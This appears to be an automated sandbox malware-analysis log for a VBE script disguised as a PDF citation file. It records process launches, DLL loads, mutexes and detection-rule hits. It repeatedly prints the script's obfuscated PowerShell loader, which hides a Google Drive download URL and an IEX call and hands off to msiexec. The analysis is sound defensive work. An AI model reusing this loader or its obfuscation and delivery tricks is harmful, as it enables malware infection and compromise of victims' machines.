behavior
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeCode function: 2_2_00007FF848C4CD022_2_00007FF848C4CD02
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeCode function: 2_2_00007FF848C4BF562_2_00007FF848C4BF56
              Source: C:\Windows\System32\wscript.exeProcess created: Commandline size = 6263
              Source: unknownProcess created: Commandline size = 6263
              Source: C:\Windows\System32\wscript.exeProcess created: Commandline size = 6263Jump to behavior
              Source: amsi64_7364.amsi.csv, type: OTHERMatched rule: INDICATOR_SUSPICIOUS_PWSH_B64Encoded_Concatenated_FileEXEC author = ditekSHen, description = Detects PowerShell scripts containing patterns of base64 encoded files, concatenation and execution
              Source: amsi32_7808.amsi.csv, type: OTHERMatched rule: INDICATOR_SUSPICIOUS_PWSH_B64Encoded_Concatenated_FileEXEC author = ditekSHen, description = Detects PowerShell scripts containing patterns of base64 encoded files, concatenation and execution
              Source: Process Memory Space: powershell.exe PID: 7364, type: MEMORYSTRMatched rule: INDICATOR_SUSPICIOUS_PWSH_B64Encoded_Concatenated_FileEXEC author = ditekSHen, description = Detects PowerShell scripts containing patterns of base64 encoded files, concatenation and execution
              Source: Process Memory Space: powershell.exe PID: 7808, type: MEMORYSTRMatched rule: INDICATOR_SUSPICIOUS_PWSH_B64Encoded_Concatenated_FileEXEC author = ditekSHen, description = Detects PowerShell scripts containing patterns of base64 encoded files, concatenation and execution
              Source: classification engineClassification label: mal100.troj.expl.evad.winVBE@9/7@2/2
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeFile created: C:\Users\user\AppData\Roaming\Malodourously.darJump to behavior
              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeMutant created: NULL
              Source: C:\Windows\SysWOW64\msiexec.exeMutant created: \Sessions\1\BaseNamedObjects\Rmc-8OIXMO
              Source: C:\Windows\System32\conhost.exeMutant created: \Sessions\1\BaseNamedObjects\Local\SM0:7816:120:WilError_03
              Source: C:\Windows\System32\conhost.exeMutant created: \Sessions\1\BaseNamedObjects\Local\SM0:7380:120:WilError_03
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeFile created: C:\Users\user\AppData\Local\Temp\__PSScriptPolicyTest_yafzq4zp.f55.ps1Jump to behavior
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeWMI Queries: IWbemServices::ExecQuery - root\cimv2 : select * from win32_process where ProcessId=7364
              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeWMI Queries: IWbemServices::ExecQuery - root\cimv2 : select * from win32_process where ProcessId=7808
              Source: C:\Windows\System32\wscript.exeFile read: C:\Users\user\Desktop\desktop.iniJump to behavior
              Source: C:\Windows\System32\wscript.exeKey opened: HKEY_LOCAL_MACHINE\Software\Policies\Microsoft\Windows\Safer\CodeIdentifiersJump to behavior
              Source: unknownProcess created: C:\Windows\System32\wscript.exe C:\Windows\System32\WScript.exe "C:\Users\user\Desktop\LSMU CITATA LT 20-11-2024#U00b7pdf.vbe"
              Source: C:\Windows\System32\wscript.exeProcess created: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" "<#Subnutritious Uninstructedness snigvejen Sortilegi #><#Diectasis Rodfunktioner Brdristens Sangerne #>$Bortfaldenes='Obskniteters';function Allemandes($Erhvervsgeografien){If ($host.DebuggerEnabled) {$nickelodeons=4} for ($Thimotheuss=$nickelodeons;;$Thimotheuss+=5){if(!$Erhvervsgeografien[$Thimotheuss]) { break }$Adgangskortenes55+=$Erhvervsgeografien[$Thimotheuss]}$Adgangskortenes55}function Xylotomies207($Sablende){ .($Douser) ($Sablende)}$Samandura=Allemandes 'BeteN TjeE inttRace. DelWSteneJustb FutCBacklTheoIRensEKagenRecat';$Trolls=Allemandes 'KonsMDrivo lluzHvlbipicklReprl J.naTold/';$Tereu=Allemandes 'NonaTGo.ilBegosEpid1 Opk2';$Tapeline=' Kat[ GuendelmeProit pro. UkoSAnakeMon.r.eacvla,gI R.fC SumeCorypCromo erIKjo nTopftSicum umoaForsN oraSoftgAeaceAffiRSpy ]endi:Liga: ,veSRevleYeascMareUBundrSvrniRoulTTi byin oP w nRLumboLaocT Foro zencToplOc rvLBars= Fer$OvartdiveE ReirB neEDen U';$Trolls+=Allemandes ' Tub5Firb.Sing0Rger Ngle(E,shWSel iBrs.n Li,dAfproGraywWronsOpsv H,ksN.ranTB dm Tyr 1Afko0Nonf.Unsp0Char; Kab nkuWB skiThu nLose6U su4Elec;svin Theox nom6Alge4,ice;U,ve n.nrKa.evAwfu:Spur1E.vi3H pe1F sh.Metr0 Enc)afna BegaG Greeel zcPrenkGrapoDekl/Mine2Aris0Semi1.ini0tvan0 Ano1Fr n0 Sol1alb, inF einiGrnsrSlove,verfPr voImbrxVisu/,ide1Alla3F,is1 He .,rem0';$Floristernes=Allemandes ' BreUPulssGuide PasrEnso-jestA Br GCus ENo tnMrkeT';$Infinitively=Allemandes 'NonmhArmvtBekrtSpanp uersWa e:Akry/Soc./ vrdd otr .uciTranv SereStag.SatrgHjeroableoCensg LaplExcieinte.vandcPoetoSu fm Ska/H teupr mc rk?Overe enxDecapruntoMararbro tKnob=tabudSe ioPropwOstenBar.llustoRivea Re dOrga& Geni haedDith=.lot1 rekzheadiMeloYStkyxC unCKummjDe.kUDescv.egij No.9Acra9TranQEna tVa.mXKolaQiracjPostBPianjTereAFacex BihM B osRegne AdemU saosysi3CondELondXBill9adonDvapu8Stanj';$Chroococcoid=Allemandes 'Malp>';$Douser=Allemandes 'GirgILrebEPegbx';$Jakey='Risting';$Undepreciatory='\Malodourously.dar';Xylotomies207 (Allemandes 'Glue$BeclgAfbll TesoVrisb InqA lazlNomi:AtroB.eetrI quI .ubsthinKffes=Feb,$Jus eElixNWoohVSvam:OppuA UnppRan pNo,mdHa vA Ma t s nAAnti+Af.a$LedeuS erNN veDDokuEAtomP BanrV,teEDadacHjruI AnbA,hilt nnooDoseRRe lY');Xylotomies207 (Allemandes 'Abat$AdelGM isLSuppo TarBFag,aC smL .es:HusmoNoduM Ti sIu iaaarst BistCannECell=E.en$ GavICallnOverfSkumIOverNLapiIUdb,tR ndisabbvweire An.lMissYKobl. U ssSlipPPa,iLRastI S mT ice( S,o$ egicDa kHGasmrUnsioOp,uORe,lC TurO.patcCoadCKar.o BorI ,ukDlde )');Xylotomies207 (Allemandes $Tapeline);$Infinitively=$Omsatte[0];$Unpositively=(Allemandes ' Del$Eu,aGU koLVa eONiccb Kn AHiplLB yg:HaarwSupeiT.mmECathNSl eERetiRNumibA teRTanddKompsCavasqua TD,loNReprG PlueLysnrcandNJrg e Gei=ImpeNDu dEtit WS en-RaadoVanrb Lo jOmdmEV ndCBrieT ykn Tecssel YRg.osfalsT BonEDe,lM Afs.Auke$UnchSPoliATorfM tudASandNPam D Flau FelRLaurA');Xylotomies207 ($Unpositively);Xylotomies207 (Allemandes ' T,e$BoucW peri
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess created: C:\Windows\System32\conhost.exe C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
              Source: unknownProcess created: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe "C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe" "<#Subnutritious Uninstructedness snigvejen Sortilegi #><#Diectasis Rodfunktioner Brdristens Sangerne #>$Bortfaldenes='Obskniteters';function Allemandes($Erhvervsgeografien){If ($host.DebuggerEnabled) {$nickelodeons=4} for ($Thimotheuss=$nickelodeons;;$Thimotheuss+=5){if(!$Erhvervsgeografien[$Thimotheuss]) { break }$Adgangskortenes55+=$Erhvervsgeografien[$Thimotheuss]}$Adgangskortenes55}function Xylotomies207($Sablende){ .($Douser) ($Sablende)}$Samandura=Allemandes 'BeteN TjeE inttRace. DelWSteneJustb FutCBacklTheoIRensEKagenRecat';$Trolls=Allemandes 'KonsMDrivo lluzHvlbipicklReprl J.naTold/';$Tereu=Allemandes 'NonaTGo.ilBegosEpid1 Opk2';$Tapeline=' Kat[ GuendelmeProit pro. UkoSAnakeMon.r.eacvla,gI R.fC SumeCorypCromo erIKjo nTopftSicum umoaForsN oraSoftgAeaceAffiRSpy ]endi:Liga: ,veSRevleYeascMareUBundrSvrniRoulTTi byin oP w nRLumboLaocT Foro zencToplOc rvLBars= Fer$OvartdiveE ReirB neEDen U';$Trolls+=Allemandes ' Tub5Firb.Sing0Rger Ngle(E,shWSel iBrs.n Li,dAfproGraywWronsOpsv H,ksN.ranTB dm Tyr 1Afko0Nonf.Unsp0Char; Kab nkuWB skiThu nLose6U su4Elec;svin Theox nom6Alge4,ice;U,ve n.nrKa.evAwfu:Spur1E.vi3H pe1F sh.Metr0 Enc)afna BegaG Greeel zcPrenkGrapoDekl/Mine2Aris0Semi1.ini0tvan0 Ano1Fr n0 Sol1alb, inF einiGrnsrSlove,verfPr voImbrxVisu/,ide1Alla3F,is1 He .,rem0';$Floristernes=Allemandes ' BreUPulssGuide PasrEnso-jestA Br GCus ENo tnMrkeT';$Infinitively=Allemandes 'NonmhArmvtBekrtSpanp uersWa e:Akry/Soc./ vrdd otr .uciTranv SereStag.SatrgHjeroableoCensg LaplExcieinte.vandcPoetoSu fm Ska/H teupr mc rk?Overe enxDecapruntoMararbro tKnob=tabudSe ioPropwOstenBar.llustoRivea Re dOrga& Geni haedDith=.lot1 rekzheadiMeloYStkyxC unCKummjDe.kUDescv.egij No.9Acra9TranQEna tVa.mXKolaQiracjPostBPianjTereAFacex BihM B osRegne AdemU saosysi3CondELondXBill9adonDvapu8Stanj';$Chroococcoid=Allemandes 'Malp>';$Douser=Allemandes 'GirgILrebEPegbx';$Jakey='Risting';$Undepreciatory='\Malodourously.dar';Xylotomies207 (Allemandes 'Glue$BeclgAfbll TesoVrisb InqA lazlNomi:AtroB.eetrI quI .ubsthinKffes=Feb,$Jus eElixNWoohVSvam:OppuA UnppRan pNo,mdHa vA Ma t s nAAnti+Af.a$LedeuS erNN veDDokuEAtomP BanrV,teEDadacHjruI AnbA,hilt nnooDoseRRe lY');Xylotomies207 (Allemandes 'Abat$AdelGM isLSuppo TarBFag,aC smL .es:HusmoNoduM Ti sIu iaaarst BistCannECell=E.en$ GavICallnOverfSkumIOverNLapiIUdb,tR ndisabbvweire An.lMissYKobl. U ssSlipPPa,iLRastI S mT ice( S,o$ egicDa kHGasmrUnsioOp,uORe,lC TurO.patcCoadCKar.o BorI ,ukDlde )');Xylotomies207 (Allemandes $Tapeline);$Infinitively=$Omsatte[0];$Unpositively=(Allemandes ' Del$Eu,aGU koLVa eONiccb Kn AHiplLB yg:HaarwSupeiT.mmECathNSl eERetiRNumibA teRTanddKompsCavasqua TD,loNReprG PlueLysnrcandNJrg e Gei=ImpeNDu dEtit WS en-RaadoVanrb Lo jOmdmEV ndCBrieT ykn Tecssel YRg.osfalsT BonEDe,lM Afs.Auke$UnchSPoliATorfM tudASandNPam D Flau FelRLaurA');Xylotomies207 ($Unpositively);Xylotomies207 (Allemandes ' T,e$BoucW peri
              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess created: C:\Windows\System32\conhost.exe C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess created: C:\Windows\SysWOW64\msiexec.exe "C:\Windows\SysWOW64\msiexec.exe"
              Source: unknownProcess created: C:\Windows\SysWOW64\msiexec.exe "C:\Windows\System32\msiexec.exe"
              Source: C:\Windows\System32\wscript.exeProcess created: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" "<#Subnutritious Uninstructedness snigvejen Sortilegi #><#Diectasis Rodfunktioner Brdristens Sangerne #>$Bortfaldenes='Obskniteters';function Allemandes($Erhvervsgeografien){If ($host.DebuggerEnabled) {$nickelodeons=4} for ($Thimotheuss=$nickelodeons;;$Thimotheuss+=5){if(!$Erhvervsgeografien[$Thimotheuss]) { break }$Adgangskortenes55+=$Erhvervsgeografien[$Thimotheuss]}$Adgangskortenes55}function Xylotomies207($Sablende){ .($Douser) ($Sablende)}$Samandura=Allemandes 'BeteN TjeE inttRace. DelWSteneJustb FutCBacklTheoIRensEKagenRecat';$Trolls=Allemandes 'KonsMDrivo lluzHvlbipicklReprl J.naTold/';$Tereu=Allemandes 'NonaTGo.ilBegosEpid1 Opk2';$Tapeline=' Kat[ GuendelmeProit pro. UkoSAnakeMon.r.eacvla,gI R.fC SumeCorypCromo erIKjo nTopftSicum umoaForsN oraSoftgAeaceAffiRSpy ]endi:Liga: ,veSRevleYeascMareUBundrSvrniRoulTTi byin oP w nRLumboLaocT Foro zencToplOc rvLBars= Fer$OvartdiveE ReirB neEDen U';$Trolls+=Allemandes ' Tub5Firb.Sing0Rger Ngle(E,shWSel iBrs.n Li,dAfproGraywWronsOpsv H,ksN.ranTB dm Tyr 1Afko0Nonf.Unsp0Char; Kab nkuWB skiThu nLose6U su4Elec;svin Theox nom6Alge4,ice;U,ve n.nrKa.evAwfu:Spur1E.vi3H pe1F sh.Metr0 Enc)afna BegaG Greeel zcPrenkGrapoDekl/Mine2Aris0Semi1.ini0tvan0 Ano1Fr n0 Sol1alb, inF einiGrnsrSlove,verfPr voImbrxVisu/,ide1Alla3F,is1 He .,rem0';$Floristernes=Allemandes ' BreUPulssGuide PasrEnso-jestA Br GCus ENo tnMrkeT';$Infinitively=Allemandes 'NonmhArmvtBekrtSpanp uersWa e:Akry/Soc./ vrdd otr .uciTranv SereStag.SatrgHjeroableoCensg LaplExcieinte.vandcPoetoSu fm Ska/H teupr mc rk?Overe enxDecapruntoMararbro tKnob=tabudSe ioPropwOstenBar.llustoRivea Re dOrga& Geni haedDith=.lot1 rekzheadiMeloYStkyxC unCKummjDe.kUDescv.egij No.9Acra9TranQEna tVa.mXKolaQiracjPostBPianjTereAFacex BihM B osRegne AdemU saosysi3CondELondXBill9adonDvapu8Stanj';$Chroococcoid=Allemandes 'Malp>';$Douser=Allemandes 'GirgILrebEPegbx';$Jakey='Risting';$Undepreciatory='\Malodourously.dar';Xylotomies207 (Allemandes 'Glue$BeclgAfbll TesoVrisb InqA lazlNomi:AtroB.eetrI quI .ubsthinKffes=Feb,$Jus eElixNWoohVSvam:OppuA UnppRan pNo,mdHa vA Ma t s nAAnti+Af.a$LedeuS erNN veDDokuEAtomP BanrV,teEDadacHjruI AnbA,hilt nnooDoseRRe lY');Xylotomies207 (Allemandes 'Abat$AdelGM isLSuppo TarBFag,aC smL .es:HusmoNoduM Ti sIu iaaarst BistCannECell=E.en$ GavICallnOverfSkumIOverNLapiIUdb,tR ndisabbvweire An.lMissYKobl. U ssSlipPPa,iLRastI S mT ice( S,o$ egicDa kHGasmrUnsioOp,uORe,lC TurO.patcCoadCKar.o BorI ,ukDlde )');Xylotomies207 (Allemandes $Tapeline);$Infinitively=$Omsatte[0];$Unpositively=(Allemandes ' Del$Eu,aGU koLVa eONiccb Kn AHiplLB yg:HaarwSupeiT.mmECathNSl eERetiRNumibA teRTanddKompsCavasqua TD,loNReprG PlueLysnrcandNJrg e Gei=ImpeNDu dEtit WS en-RaadoVanrb Lo jOmdmEV ndCBrieT ykn Tecssel YRg.osfalsT BonEDe,lM Afs.Auke$UnchSPoliATorfM tudASandNPam D Flau FelRLaurA');Xylotomies207 ($Unpositively);Xylotomies207 (Allemandes ' T,e$BoucW periJump to behavior
              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess created: C:\Windows\SysWOW64\msiexec.exe "C:\Windows\SysWOW64\msiexec.exe"Jump to behavior
              Source: C:\Windows\System32\wscript.exeSection loaded: version.dllJump to behavior
              Source: C:\Windows\System32\wscript.exeSection loaded: kernel.appcore.dllJump to behavior
              Source: C:\Windows\System32\wscript.exeSection loaded: uxtheme.dllJump to behavior
              Source: C:\Windows\System32\wscript.exeSection loaded: sxs.dllJump to behavior
              Source: C:\Windows\System32\wscript.exeSection loaded: vbscript.dllJump to behavior
              Source: C:\Windows\System32\wscript.exeSection loaded: amsi.dllJump to behavior
              Source: C:\Windows\System32\wscript.exeSection loaded: userenv.dllJump to behavior
              Source: C:\Windows\System32\wscript.exeSection loaded: profapi.dllJump to behavior
              Source: C:\Windows\System32\wscript.exeSection loaded: wldp.dllJump to behavior
              Source: C:\Windows\System32\wscript.exeSection loaded: msasn1.dllJump to behavior
              Source: C:\Windows\System32\wscript.exeSection loaded: cryptsp.dllJump to behavior
              Source: C:\Windows\System32\wscript.exeSection loaded: rsaenh.dllJump to behavior
              Source: C:\Windows\System32\wscript.exeSection loaded: cryptbase.dllJump to behavior
              Source: C:\Windows\System32\wscript.exeSection loaded: msisip.dllJump to behavior
              Source: C:\Windows\System32\wscript.exeSection loaded: wshext.dllJump to behavior
              Source: C:\Windows\System32\wscript.exeSection loaded: scrobj.dllJump to behavior
              Source: C:\Windows\System32\wscript.exeSection loaded: scrrun.dllJump to behavior
              Source: C:\Windows\System32\wscript.exeSection loaded: propsys.dllJump to behavior
              Source: C:\Windows\System32\wscript.exeSection loaded: windows.storage.dllJump to behavior
              Source: C:\Windows\System32\wscript.exeSection loaded: edputil.dllJump to behavior
              Source: C:\Windows\System32\wscript.exeSection loaded: urlmon.dllJump to behavior
              Source: C:\Windows\System32\wscript.exeSection loaded: iertutil.dllJump to behavior
              Source: C:\Windows\System32\wscript.exeSection loaded: srvcli.dllJump to behavior
              Source: C:\Windows\System32\wscript.exeSection loaded: netutils.dllJump to behavior
              Source: C:\Windows\System32\wscript.exeSection loaded: windows.staterepositoryps.dllJump to behavior
              Source: C:\Windows\System32\wscript.exeSection loaded: sspicli.dllJump to behavior
              Source: C:\Windows\System32\wscript.exeSection loaded: wintypes.dllJump to behavior
              Source: C:\Windows\System32\wscript.exeSection loaded: appresolver.dllJump to behavior
              Source: C:\Windows\System32\wscript.exeSection loaded: bcp47langs.dllJump to behavior
              Source: C:\Windows\System32\wscript.exeSection loaded: slc.dllJump to behavior
              Source: C:\Windows\System32\wscript.exeSection loaded: sppc.dllJump to behavior
              Source: C:\Windows\System32\wscript.exeSection loaded: onecorecommonproxystub.dllJump to behavior
              Source: C:\Windows\System32\wscript.exeSection loaded: onecoreuapcommonproxystub.dllJump to behavior
              Source: C:\Windows\System32\wscript.exeSection loaded: pcacli.dllJump to behavior
              Source: C:\Windows\System32\wscript.exeSection loaded: mpr.dllJump to behavior
              Source: C:\Windows\System32\wscript.exeSection loaded: sfc_os.dllJump to behavior
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: atl.dllJump to behavior
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: mscoree.dllJump to behavior
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: kernel.appcore.dllJump to behavior
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: version.dllJump to behavior
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: vcruntime140_clr0400.dllJump to behavior
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: ucrtbase_clr0400.dllJump to behavior
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: ucrtbase_clr0400.dllJump to behavior
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: cryptsp.dllJump to behavior
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: rsaenh.dllJump to behavior
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: cryptbase.dllJump to behavior
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: amsi.dllJump to behavior
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: userenv.dllJump to behavior
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: profapi.dllJump to behavior
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: windows.storage.dllJump to behavior
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: wldp.dllJump to behavior
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: msasn1.dllJump to behavior
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: gpapi.dllJump to behavior
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: msisip.dllJump to behavior
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: wshext.dllJump to behavior
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: appxsip.dllJump to behavior
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: opcservices.dllJump to behavior
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: secur32.dllJump to behavior
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: sspicli.dllJump to behavior
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: uxtheme.dllJump to behavior
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: rasapi32.dllJump to behavior
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: rasman.dllJump to behavior
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: rtutils.dllJump to behavior
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: mswsock.dllJump to behavior
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: winhttp.dllJump to behavior
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: ondemandconnroutehelper.dllJump to behavior
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: iphlpapi.dllJump to behavior
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: dhcpcsvc6.dllJump to behavior
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: dhcpcsvc.dllJump to behavior
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: dnsapi.dllJump to behavior
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: winnsi.dllJump to behavior
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: rasadhlp.dllJump to behavior
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: fwpuclnt.dllJump to behavior
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: schannel.dllJump to behavior
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: mskeyprotect.dllJump to behavior
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: ntasn1.dllJump to behavior
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: ncrypt.dllJump to behavior
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: ncryptsslp.dllJump to behavior
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: wbemcomn.dllJump to behavior
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: napinsp.dllJump to behavior
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: pnrpnsp.dllJump to behavior
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: wshbth.dllJump to behavior
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: nlaapi.dllJump to behavior
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: winrnr.dllJump to behavior
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: sxs.dllJump to behavior
              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: atl.dllJump to behavior
              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: mscoree.dllJump to behavior
              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: kernel.appcore.dllJump to behavior
              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: version.dllJump to behavior
              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: vcruntime140_clr0400.dllJump to behavior
              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: ucrtbase_clr0400.dllJump to behavior
              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: cryptsp.dllJump to behavior
              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: rsaenh.dllJump to behavior
              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: cryptbase.dllJump to behavior
              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: windows.storage.dllJump to behavior
              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: wldp.dllJump to behavior
              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: msasn1.dllJump to behavior
              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: amsi.dllJump to behavior
              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: userenv.dllJump to behavior
              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: profapi.dllJump to behavior
              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: msisip.dllJump to behavior
              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: wshext.dllJump to behavior
              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: appxsip.dllJump to behavior
              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: opcservices.dllJump to behavior
              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: gpapi.dllJump to behavior
              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: secur32.dllJump to behavior
              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: sspicli.dllJump to behavior
              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: uxtheme.dllJump to behavior
              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: wbemcomn.dllJump to behavior
              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: napinsp.dllJump to behavior
              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: pnrpnsp.dllJump to behavior
              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: wshbth.dllJump to behavior
              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: nlaapi.dllJump to behavior
              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: iphlpapi.dllJump to behavior
              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: mswsock.dllJump to behavior
              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: dnsapi.dllJump to behavior
              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: winrnr.dllJump to behavior
              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: fwpuclnt.dllJump to behavior
              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: rasadhlp.dllJump to behavior
              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: apphelp.dllJump to behavior
              Source: C:\Windows\SysWOW64\msiexec.exeSection loaded: apphelp.dllJump to behavior
              Source: C:\Windows\SysWOW64\msiexec.exeSection loaded: aclayers.dllJump to behavior
              Source: C:\Windows\SysWOW64\msiexec.exeSection loaded: mpr.dllJump to behavior
              Source: C:\Windows\SysWOW64\msiexec.exeSection loaded: sfc.dllJump to behavior
              Source: C:\Windows\SysWOW64\msiexec.exeSection loaded: sfc_os.dllJump to behavior
              Source: C:\Windows\SysWOW64\msiexec.exeSection loaded: wininet.dllJump to behavior
              Source: C:\Windows\SysWOW64\msiexec.exeSection loaded: iertutil.dllJump to behavior
              Source: C:\Windows\SysWOW64\msiexec.exeSection loaded: sspicli.dllJump to behavior
              Source: C:\Windows\SysWOW64\msiexec.exeSection loaded: windows.storage.dllJump to behavior
              Source: C:\Windows\SysWOW64\msiexec.exeSection loaded: wldp.dllJump to behavior
              Source: C:\Windows\SysWOW64\msiexec.exeSection loaded: profapi.dllJump to behavior
              Source: C:\Windows\SysWOW64\msiexec.exeSection loaded: kernel.appcore.dllJump to behavior
              Source: C:\Windows\SysWOW64\msiexec.exeSection loaded: ondemandconnroutehelper.dllJump to behavior
              Source: C:\Windows\SysWOW64\msiexec.exeSection loaded: winhttp.dllJump to behavior
              Source: C:\Windows\SysWOW64\msiexec.exeSection loaded: iphlpapi.dllJump to behavior
              Source: C:\Windows\SysWOW64\msiexec.exeSection loaded: mswsock.dllJump to behavior
              Source: C:\Windows\SysWOW64\msiexec.exeSection loaded: winnsi.dllJump to behavior
